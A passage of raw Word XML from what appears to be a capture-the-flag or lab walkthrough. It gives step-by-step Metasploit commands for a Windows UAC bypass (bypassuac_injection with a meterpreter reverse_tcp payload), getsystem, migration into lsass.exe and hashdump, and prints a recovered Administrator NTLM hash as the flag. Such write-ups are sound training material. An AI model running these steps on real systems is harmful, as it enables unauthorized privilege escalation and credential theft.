        <w:t>We can observe that we do not have permission to elevate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7651E3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Get a windows shell and check if the admin user is a member of the Administrators group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22303C78" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C9A9E" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40145CC4" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68379BF9" w14:textId="061E9BFC" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="008B13A6" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F52BD2E" wp14:editId="0F72720F">
            <wp:extent cx="5759746" cy="2013053"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="954862031" name="Picture 39"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62031" name="Picture 39" descr="A screenshot of a computer erro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59746" cy="2013053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38679851" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>The admin user is a member of the Administrators group. However, we do not have the high privilege as of now. We can gain high privilege by Bypassing UAC (User Account Control).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B34BD" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">We are going to bypass UAC using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit local exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55332447" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">“This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>EXE::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">Custom your DLL should call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>) after starting your payload in a separate process.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603AE1B" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> [https://www.rapid7.com/db/modules/exploit/windows/local/bypassuac_injection/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B1460" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Background the current session and use the local exploit for UAC bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389AD85" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2B0E3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>CTRL + C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8F20C" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA7A52" w14:textId="6251FFDA" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B3C669B" wp14:editId="4B9E5993">
            <wp:extent cx="5943600" cy="781685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1658779475" name="Picture 20"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ontent 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781685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC36BF6" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 12:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Run UAC Bypass In-Memory Injection module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711A3D8" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC76964" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>bypassuac_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F22E597" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE978B" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>set TARGET 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48986020" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18AC810C" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E5C56" w14:textId="77777777" w:rsidR="008B13A6" w:rsidRDefault="008B13A6" w:rsidP="00CD5944"/>
    <w:p w14:paraId="2CDF5F89" w14:textId="7AF30D9E" w:rsidR="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57393B19" wp14:editId="0434DC46">
            <wp:extent cx="5943600" cy="878400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1596307738" name="Picture 19"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ontent Image"/>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65937"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="878400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFE282" w14:textId="1C736748" w:rsidR="008B13A6" w:rsidRPr="00CD5944" w:rsidRDefault="008B13A6" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="124DEA22" wp14:editId="26ED9AD2">
            <wp:extent cx="5778797" cy="2317869"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="198864586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45867" name="Picture 1988645867"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5778797" cy="2317869"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060CAC3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 13:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Elevate to the high privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F52F5" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E8315" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25677CB2" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E2777C2" w14:textId="543B6327" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="008B13A6" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0557C33C" wp14:editId="0F79EBED">
            <wp:extent cx="5245370" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1212029568" name="Picture 4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29568" name="Picture 41" descr="A black screen with white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245370" cy="774740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29FEB5" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>We have successfully gained high privilege access. Dump the user hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D2631" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 14:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Migrate in lsass.exe process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F07BC" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E87A49" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> -S lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303EAFF8" w14:textId="713AE60B" w:rsidR="00F93159" w:rsidRPr="00CD5944" w:rsidRDefault="00F93159" w:rsidP="00CD5944">
      <w:r>
        <w:t xml:space="preserve">#-S: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F93159">
        <w:t>show only processes matching the given name/pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A804D4" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>migrate 484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE2FB3" w14:textId="6EB3A6DB" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00F6661E" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D151A5D" wp14:editId="218F8BCD">
            <wp:extent cx="5848651" cy="2724290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45109408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94089" name="Picture 451094089"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848651" cy="2724290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608DB70" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 15:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Dump the hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD749CE" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A372FE3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3234FF51" w14:textId="650B5613" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00F6661E" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF1F190" wp14:editId="3C26400E">
            <wp:extent cx="5772447" cy="977950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="723461121" name="Picture 43"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61121" name="Picture 43" descr="A computer screen with white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72447" cy="977950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="363396FA" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>This reveals the flag to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433B269" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator NTLM Hash:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> f168d9f8e6c5b893b8c4dfa202228235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F73767" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRDefault="00CD5944"/>
    <w:p w14:paraId="09327C14" w14:textId="3DE89581" w:rsidR="00DB51E5" w:rsidRDefault="00DB5B99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBC4D02" wp14:editId="38C022D1">
            <wp:extent cx="3943553" cy="666784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1406952097" name="Picture 44" descr="A black and white pictur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52097" name="Picture 44" descr="A black and white picture of a person&#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943553" cy="666784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C9EB6" w14:textId="2701478A" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD7806" w14:textId="0E9F8E73" w:rsidR="00CD5944" w:rsidRDefault="00CD5944">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>username :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>RID :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> LM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hash :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hash :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> extra fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955B330" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRDefault="00CD594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4266"/>
        <w:gridCol w:w="3959"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD5944" w:rsidRPr="00CD5944" w14:paraId="2EC5ABC8" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45759DBB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C30D5F7" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088D4611" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5944" w:rsidRPr="00CD5944" w14:paraId="63403CD0" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="705BD492" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DF6D8BB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>Account name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E542CB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5944" w:rsidRPr="00CD5944" w14:paraId="59DE7181" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3269D3F3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>RID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F4E9B2" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
            <w:r w:rsidRPr="00CD5944">
              <w:t>Relative ID (unique per user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
